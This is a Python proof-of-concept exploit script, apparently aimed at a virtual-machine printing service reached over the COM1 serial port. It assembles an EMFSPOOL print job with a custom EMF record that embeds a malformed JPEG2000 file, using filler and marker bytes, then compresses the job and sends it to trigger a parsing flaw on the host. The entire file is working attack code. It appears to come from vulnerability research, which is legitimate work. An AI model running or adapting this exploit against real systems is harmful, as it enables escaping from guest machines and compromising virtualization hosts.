from ctypes import *
from ctypes.wintypes import BYTE
from ctypes.wintypes import WORD
from ctypes.wintypes import DWORD
import sys
import struct
import binascii
import array
import zlib

class DCB(Structure):
    _fields_=[
        ('DCBlength',DWORD),
        ('BaudRate',DWORD),
        ('fBinary',DWORD,1),
        ('fParity',DWORD,1),
        ('fOutxCtsFlow',DWORD,1),
        ('fOutxDsrFlow',DWORD,1),
        ('fDtrControl',DWORD,2),
        ('fDsrSensitivity',DWORD,1),
        ('fTXContinueOnXoff',DWORD,1),
        ('fOutX',DWORD,1),
        ('fInX',DWORD,1),
        ('fErrorChar',DWORD,1),
        ('fNull',DWORD,1),
        ('fRtsControl',DWORD,2),
        ('fAbortOnError',DWORD,1),
        ('fDummy2',DWORD,17),
        ('wReserved',WORD),
        ('XonLim',WORD),
        ('XoffLim',WORD),
        ('ByteSize',BYTE),
        ('Parity',BYTE),
        ('StopBits',BYTE),
        ('XonChar',c_char),
        ('XoffChar',c_char),
        ('ErrorChar',c_char),
        ('EofChar',c_char),
        ('EvtChar',c_char),
        ('wReserved1',WORD),
    ]

class COMMTIMEOUTS(Structure):
    _fields_=[
        ('ReadIntervalTimeout',DWORD),
        ('ReadTotalTimeoutMultiplier',DWORD),
        ('ReadTotalTimeoutConstant',DWORD),
        ('WriteTotalTimeoutMultiplier',DWORD),
        ('WriteTotalTimeoutConstant',DWORD),
    ]

class TPVM:

    SERIAL_PORT=b'\\\\.\\COM1'

    def __init__(self):
        self.hPort=windll.kernel32.CreateFileA(self.SERIAL_PORT,
                                               0xc0000000, # GENERIC_READ | GENERIC_WRITE
                                               3,          # FILE_SHARE_READ | FILE_SHARE_WRITE
                                               None,
                                               3,          # OPEN_EXISTING
                                               0,
                                               None)
        if (self.hPort & 0xffffffff) == 0xffffffff:
            raise Exception('the serial port could not be opened (0x%08x)'%(GetLastError()))

        if not windll.kernel32.SetupComm(self.hPort, 0x20000, 0x84d0):
            raise WinError()

        dcb=DCB()
        dcb.DCBlength  = 0x1c
        dcb.BaudRate = 0x1C200
        dcb.fBinary = 1
        dcb.fOutxCtsFlow = 1
        dcb.fDtrControl = 2
        dcb.fRtsControl = 2
        dcb.ByteSize = 8
        dcb.fAbortOnError = 1
        windll.kernel32.SetCommState(self.hPort, byref(dcb))
        commtimeouts = COMMTIMEOUTS()
        commtimeouts.ReadIntervalTimeout = 0
        commtimeouts.ReadTotalTimeoutMultiplier = 0
        commtimeouts.ReadTotalTimeoutConstant = 20000
        commtimeouts.WriteTotalTimeoutMultiplier = 0
        commtimeouts.WriteTotalTimeoutConstant = 20000
        if not windll.kernel32.SetCommTimeouts(self.hPort, byref(commtimeouts)):
            raise WinError()

    def __write_packet(self,buffer):
        bytesWritten=DWORD(0)
        if not windll.kernel32.WriteFile(self.hPort,
                                         buffer,
                                         len(buffer),
                                         byref(bytesWritten),
                                         None):
            raise WinError()
        print('%d bytes written' % (bytesWritten.value))

    def __read_packet(self,n):
        return
        buffer = c_buffer(n)
        bytesRead = DWORD(0)
        if not windll.kernel32.ReadFile(self.hPort,
                                        buffer,
                                        n,
                                        byref(bytesRead),
                                        None):
            raise WinError()
        print('%d bytes read' % (bytesRead.value))
        return buffer.raw

    def __write(self,buffer):
        while len(buffer) != 0:
            n = min(len(buffer), 0x7ffd)
            self.__write_packet(struct.pack('<H', n) + buffer[:n])
            buffer = buffer[n:]

    def __read_1byte(self):
        return
        b = self.__read_packet(1)
        if len(b) != 1:
            return 1
        return struct.unpack('<B', b)[0]

    def do_command(self,cmd):
        self.__write_packet(struct.pack('<H', cmd))
        if cmd == 0x8002:
            return 0
        return self.__read_1byte()

    def do_data(self,d):
        self.__write(d)
        return self.__read_1byte()

    def close(self):
        windll.kernel32.CloseHandle(self.hPort)

def main(args):
    PRINTER_ID = 1
    POC_J2K_PATH = "poc.jp2"
   
    if len(args) >= 2:
      POC_J2K_PATH = args[1]

    # Initialize printing.
    t = TPVM()
    t.do_command(0x8001)
    t.do_data(struct.pack('<20sIIII', ('%d' % PRINTER_ID).encode('utf-8'), 2, 0xd, 0, 0))
    t.do_data(binascii.a2b_hex('2b000100140000000000000014001d000000000063727970746f61640050494e42414c4c57495a41524400'))

    # Generate the EMF file with embedded JPEG2000.
    emf=b''
   
    # Start with the EMF header.
    emf += struct.pack('<II', 1, 0x84)
    emf += struct.pack('<IIII', 0xf1, 0xf2, 0x130b, 0x1855)
    emf += struct.pack('<IIII', 0, 0, 0x53fc, 0x6cfc)
    emf += b' EMF'
    emf += struct.pack('<I', 0x10000)
    emf += struct.pack('<IIHH', 0, 0, 0, 0)
    emf += struct.pack('<II', 0xc, 0x6c)
    emf += struct.pack('<I', 0)
    emf += struct.pack('<II', 0x13ec, 0x19c8)
    emf += struct.pack('<II', 0xd7, 0x117)
    emf += struct.pack('<III', 0, 0, 1)
    emf += struct.pack('<II', 0x347d8, 0x441d8)
    emf += ('\0'*0xc).encode('utf-16le')

    # Load the malformed JPEG2000 file.
    f = open(POC_J2K_PATH, "rb")
    j2k = f.read()
    f.close()

    # Create the custom 0x8000 record with an embedded JPEG2000 file.
    custom_record = b''
    custom_record += b'A' * 0x28
    custom_record += struct.pack('<IIII', 0x50, 0x28, 0x78, len(j2k))
    custom_record += b'B' * 0x10
    custom_record += struct.pack('<IIII', 0x43434343, 0x10, 0x10, 0x44444444)
    custom_record += b'E' * 0x18
    custom_record += j2k
    emf += struct.pack('<II', 0x8000, len(custom_record) + 8) + custom_record
    
    # EMR_EOF record.
    emf += struct.pack('<IIIII', 0xe, 0x14, 0, 0x10, 0x14)
    emf = emf[:0x30] + struct.pack('<IIH', len(emf), 3, 1) + emf[0x3a:]

    # Create the DEVMODE.
    devmode = binascii.a2b_hex('7000720069006e0074006500720000000000'+\
                               '0000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '00000000000000001040005dc0008040fff01000'+\
                               '1000100de0a66086400010007005802020001005'+\
                               '802010001004c006500740074006500720000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000545045580f020000000c0000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '001000000010110141e000e1464000614f401060'+\
                               'f000001000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000000000000000000000000000000'+\
                               '0000000000000005450504405000000')
    devmode = b'%%EMF' + struct.pack('<BI', 2, len(devmode) + 5) + devmode
    
    # Generate the EMFSPOOL file.
    emfspool_hdr = struct.pack('<II', 0x10, 0) + 'Google\0'.encode('utf-16le') + struct.pack('<HII', 0xdead, 0xc, len(emf))
    emfspool_hdr = struct.pack('<II', 0x10000, len(emfspool_hdr)) + emfspool_hdr

    # Generate a EMRI_METAFILE_EXT record.
    emri_metafile_ext = struct.pack('<IIII', 0xd, 8, len(emf) + 8, 0)

    # Put it all together.
    data_plaintext = devmode + emfspool_hdr + emf + emri_metafile_ext
    data_compressed = zlib.compress(data_plaintext, 9)
    print_command = struct.pack('<H', 0) + struct.pack('<II', len(data_compressed), len(data_plaintext)) + data_compressed

    # Send the printing command.
    t.do_data(print_command)
    #t.do_command(0x8002)
    t.close()

if __name__=='__main__':
    main(sys.argv)
